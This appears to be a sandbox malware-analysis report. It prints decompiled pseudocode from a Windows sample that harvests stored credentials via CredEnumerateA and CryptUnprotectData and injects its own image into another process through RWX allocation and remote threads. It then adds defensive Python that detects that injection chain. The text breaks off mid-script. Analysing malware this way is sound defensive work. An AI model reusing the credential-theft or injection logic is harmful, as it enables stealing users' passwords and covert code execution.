                                    						_pop(_t187);
                                    						E0040234C(_v180, _t187, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t238);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t160 = E00402274(_v204);
                                    						_push(_t160 - _t222);
                                    						E00402218( &_v208, _t174);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t174);
                                    						_pop(_t226);
                                    						_pop(_t189);
                                    						E0040234C(_v212, _t189, _t226, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v184);
                                    						_t234 = _t234 + 1;
                                    						_t60 =  &_v40;
                                    						 *_t60 = _v40 - 1;
                                    						_t249 =  *_t60;
                                    					} while ( *_t60 != 0);
                                    				}
                                    				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
                                    				E00401B14(_t238, _v216);
                                    				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
                                    				E00401B14(_t238, _v220);
                                    				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
                                    				E00401B14(_t238, _v224);
                                    				_pop(_t198);
                                    				 *[fs:eax] = _t198;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t203 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t203);
                                    			}

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t79;
                                    				void* _t84;
                                    				intOrPtr _t119;
                                    				void* _t158;
                                    				void* _t173;
                                    				void* _t185;
                                    				void* _t187;
                                    				short* _t188;
                                    				intOrPtr _t195;
                                    				intOrPtr _t200;
                                    				void* _t223;
                                    				void* _t230;
                                    				signed int _t231;
                                    				void* _t233;
                                    				intOrPtr* _t235;
                                    				intOrPtr _t237;
                                    				intOrPtr _t238;
                                    
                                    				_t172 = __ebx;
                                    				_t237 = _t238;
                                    				_t173 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t173 = _t173 - 1;
                                    				} while (_t173 != 0);
                                    				_push(_t173);
                                    				_push(__ebx);
                                    				_t233 = __eax;
                                    				_push(_t237);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t238;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t235 = _t233;
                                    				_t230 = 0x25;
                                    				_t79 =  &_v151;
                                    				_t188 =  &_v114;
                                    				do {
                                    					 *_t188 = 0 << 2;
                                    					_t188 = _t188 + 2;
                                    					_t79 = _t79 + 1;
                                    					_t230 = _t230 - 1;
                                    				} while (_t230 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t84 = _v12 - 1;
                                    				if(_t84 >= 0) {
                                    					_v40 = _t84 + 1;
                                    					_t231 = 0;
                                    					do {
                                    						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
                                    						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t119 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t235);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t172 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t235);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t185);
                                    						E0040234C(_v180, _t185, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t235);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t158 = E00402274(_v204);
                                    						_push(_t158 - _t219);
                                    						E00402218( &_v208, _t172);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t172);
                                    						_pop(_t223);
                                    						_pop(_t187);
                                    						E0040234C(_v212, _t187, _t223, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v184);
                                    						_t231 = _t231 + 1;
                                    						_t58 =  &_v40;
                                    						 *_t58 = _v40 - 1;
                                    						_t245 =  *_t58;
                                    					} while ( *_t58 != 0);
                                    				}
                                    				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
                                    				E00401B14(_t235, _v216);
                                    				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
                                    				E00401B14(_t235, _v220);
                                    				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
                                    				E00401B14(_t235, _v224);
                                    				_pop(_t195);
                                    				 *[fs:eax] = _t195;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t200 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t200);
			}

                                    Instruction addresses covered: 0x0040930c to 0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed char _t43;
                                    				long* _t50;
                                    				intOrPtr _t66;
                                    				intOrPtr _t71;
                                    				void* _t76;
                                    				void* _t94;
                                    				intOrPtr _t103;
                                    				intOrPtr _t104;
                                    				signed char _t112;
                                    				void* _t113;
                                    				signed int _t115;
                                    				void* _t116;
                                    				char* _t117;
                                    				void* _t119;
                                    
                                    				asm("adc [edx], eax");
                                    				_t43 =  *__eax ^  *[cs:ecx];
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *__ecx =  *__ecx + __edx;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				asm("adc [eax], al");
                                    				_t115 = __esi | _a73;
                                    				_t117 =  &_a1;
                                    				asm("aaa");
                                    				_pop(_t111);
                                    				asm("arpl [gs:edi+0x64], bp");
                                    				_push(_t117);
                                    				_push(_t117);
                                    				_push(_t115);
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t116 = __edx;
                                    				_t112 = _t43;
                                    				_push(_t119);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t119 + 0xffffffd8;
                                    				_t94 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t50 = _v8;
                                    				_push(_t50);
                                    				L00408978();
                                    				if(_t50 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t112);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t112);
                                    					_t66 = _v12;
                                    					_push(_t66);
                                    					L00408980();
                                    					if(_t66 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t71 = _v12;
                                    						_push(_t71);
                                    						L00408970();
                                    						if(_t71 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t76 = _v20 - 1;
                                    							if(_t76 >= 0) {
                                    								_v24 = _t76 + 1;
                                    								_t113 = 0;
                                    								do {
                                    									_t94 = _t94 +  *(_v16 + _t113);
                                    									_v40 =  *(_v16 + _t113) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
                                    									E00401D58(_t116, _v32);
                                    									_t113 = _t113 + 1;
                                    									_t30 =  &_v24;
                                    									 *_t30 = _v24 - 1;
                                    								} while ( *_t30 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
                                    							E00401D58(_t116, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t103);
                                    				 *[fs:eax] = _t103;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t104 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t104);
			}

                                    Instruction addresses covered: 0x00408ad8 to 0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				long* _t47;
                                    				intOrPtr _t63;
                                    				intOrPtr _t68;
                                    				void* _t73;
                                    				void* _t91;
                                    				intOrPtr _t99;
                                    				intOrPtr _t100;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t111;
                                    				void* _t114;
                                    
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t111 = __edx;
                                    				_t108 = __eax;
                                    				_push(_t114);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t114 + 0xffffffd8;
                                    				_t91 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t47 = _v8;
                                    				_push(_t47);
                                    				L00408978();
                                    				if(_t47 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t108);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t108);
                                    					_t63 = _v12;
                                    					_push(_t63);
                                    					L00408980();
                                    					if(_t63 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t68 = _v12;
                                    						_push(_t68);
                                    						L00408970();
                                    						if(_t68 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t73 = _v20 - 1;
                                    							if(_t73 >= 0) {
                                    								_v24 = _t73 + 1;
                                    								_t109 = 0;
                                    								do {
                                    									_t91 = _t91 +  *(_v16 + _t109);
                                    									_v40 =  *(_v16 + _t109) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
                                    									E00401D58(_t111, _v32);
                                    									_t109 = _t109 + 1;
                                    									_t29 =  &_v24;
                                    									 *_t29 = _v24 - 1;
                                    								} while ( *_t29 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
                                    							E00401D58(_t111, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t99);
                                    				 *[fs:eax] = _t99;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t100 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t100);
                                    			}

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                                    				long _v20;
                                    				long _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _t18;
                                    				void* _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t35;
                                    				long _t36;
                                    				void* _t37;
                                    
                                    				_v32 = __ecx;                                   // lpParameter handed to the remote thread
                                    				_v36 = __edx;                                   // lpStartAddress of the remote thread
                                    				_t30 = __eax;                                   // hProcess of the target process
                                    				_v28 = 0;
                                    				_t32 = GetModuleHandleA(0);                     // base of the injector's own mapped image
                                    				_push(0);
                                    				_push(_t32);
                                    				asm("cdq");
                                    				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;     // base + e_lfanew -> IMAGE_NT_HEADERS (64-bit add artefact of the decompiler)
                                    				asm("adc edx, [esp+0x4]");
                                    				_t36 =  *(_t18 + 0x50);                         // OptionalHeader.SizeOfImage
                                    				_t35 =  *(_t18 + 0x34);                         // OptionalHeader.ImageBase
                                    				VirtualFreeEx(_t30, _t35, 0, 0x8000);           // MEM_RELEASE whatever the target has at our ImageBase
                                    				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);   // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, same base
                                    				if(_t37 != 0) {
                                    					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);   // copy the already-mapped image; no relocation needed at the same base
                                    					if(_t36 <= _v24) {                          // proceed only if all SizeOfImage bytes were written
                                    						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
                                    						CloseHandle(_t30);
                                    						_v32 = _t37;
                                    					}
                                    				}
                                    				return _v28;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%
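                                    E0040AF08 above is the routine behind the "Injects a PE file into a foreign processes" signature: the sample reads ImageBase (NT headers + 0x34) and SizeOfImage (NT headers + 0x50) out of its own headers, frees and re-allocates that exact range as PAGE_EXECUTE_READWRITE in the target, copies its already-mapped image there with WriteProcessMemory, and starts a remote thread. Because the copy lands at the sample's own preferred base, no relocation is needed, which is why the code can get away with a raw memory copy. The Python below is an added example, not code from the report or from the sample: it parses those two fields with the same offsets the injector uses (on a constructed, minimal PE32 header, not the real binary) and then correlates a constructed API-call trace, modelled on the sandbox's API list for this function, to flag the free / alloc-RWX / write / thread chain per process handle. The field names of the trace records and the handle values are assumptions made for the example.

```python
from __future__ import annotations
import struct

# Constants visible at the decompiled call sites of E0040AF08
MEM_RELEASE = 0x8000            # VirtualFreeEx dwFreeType
MEM_COMMIT_RESERVE = 0x3000     # VirtualAllocEx flAllocationType (MEM_COMMIT | MEM_RESERVE)
PAGE_EXECUTE_READWRITE = 0x40   # VirtualAllocEx flProtect

# Offsets the injector dereferences off its own module base
E_LFANEW = 0x3C                 # IMAGE_DOS_HEADER.e_lfanew
NT_IMAGE_BASE = 0x34            # IMAGE_NT_HEADERS32 + 0x34 -> OptionalHeader.ImageBase
NT_SIZE_OF_IMAGE = 0x50         # IMAGE_NT_HEADERS32 + 0x50 -> OptionalHeader.SizeOfImage


def pe_image_base_and_size(image: bytes) -> tuple[int, int]:
    """Return (ImageBase, SizeOfImage) of a PE32 image using the same offsets as E0040AF08."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, E_LFANEW)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    magic = struct.unpack_from("<H", image, e_lfanew + 0x18)[0]
    if magic != 0x10B:
        # 0x34/0x50 are PE32 offsets; a PE32+ header lays these fields out differently
        raise ValueError("not a PE32 optional header")
    image_base = struct.unpack_from("<I", image, e_lfanew + NT_IMAGE_BASE)[0]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + NT_SIZE_OF_IMAGE)[0]
    return image_base, size_of_image


def build_fake_pe32(image_base: int, size_of_image: int) -> bytes:
    """Constructed minimal PE32 header (not the analysed sample): just enough for the parser above."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, E_LFANEW, 0x80)          # e_lfanew -> NT headers at 0x80
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x80 + 0x04, 0x014C)     # FileHeader.Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", hdr, 0x80 + 0x18, 0x10B)      # OptionalHeader.Magic = PE32
    struct.pack_into("<I", hdr, 0x80 + NT_IMAGE_BASE, image_base)
    struct.pack_into("<I", hdr, 0x80 + NT_SIZE_OF_IMAGE, size_of_image)
    return bytes(hdr)


def find_image_injection(trace: list[dict], image_base: int, size_of_image: int) -> list[int]:
    """Return the hProcess handles on which the full E0040AF08 call chain is observed.

    trace: ordered API-call records such as {"api": "VirtualAllocEx", "hProcess": 0x1C8, ...}.
    Each handle must go through the four stages in order; an out-of-order or
    non-matching call simply does not advance that handle.
    """
    stages = ("VirtualFreeEx", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")
    progress: dict[int, int] = {}       # hProcess -> index of the next expected stage
    hits: list[int] = []
    for rec in trace:
        h = rec.get("hProcess")
        if h is None:
            continue
        expected = stages[progress.get(h, 0)]
        ok = False
        if rec["api"] == expected == "VirtualFreeEx":
            ok = rec["lpAddress"] == image_base and rec["dwFreeType"] == MEM_RELEASE
        elif rec["api"] == expected == "VirtualAllocEx":
            ok = (rec["lpAddress"] == image_base and rec["dwSize"] == size_of_image
                  and rec["flAllocationType"] == MEM_COMMIT_RESERVE
                  and rec["flProtect"] == PAGE_EXECUTE_READWRITE)
        elif rec["api"] == expected == "WriteProcessMemory":
            ok = rec["lpBaseAddress"] == image_base and rec["nSize"] == size_of_image
        elif rec["api"] == expected == "CreateRemoteThread":
            ok = True
        if ok:
            progress[h] = progress.get(h, 0) + 1
            if progress[h] == len(stages):
                hits.append(h)
                progress[h] = 0
    return hits


# Constructed inputs: 0x00400000 matches the dump base above; the SizeOfImage and handles are made up.
FAKE_IMAGE = build_fake_pe32(0x00400000, 0x00058000)
SAMPLE_TRACE = [
    {"api": "OpenProcess", "hProcess": 0x1C8},
    {"api": "VirtualFreeEx", "hProcess": 0x1C8, "lpAddress": 0x00400000, "dwSize": 0, "dwFreeType": 0x8000},
    {"api": "VirtualAllocEx", "hProcess": 0x1C8, "lpAddress": 0x00400000, "dwSize": 0x00058000,
     "flAllocationType": 0x3000, "flProtect": 0x40},
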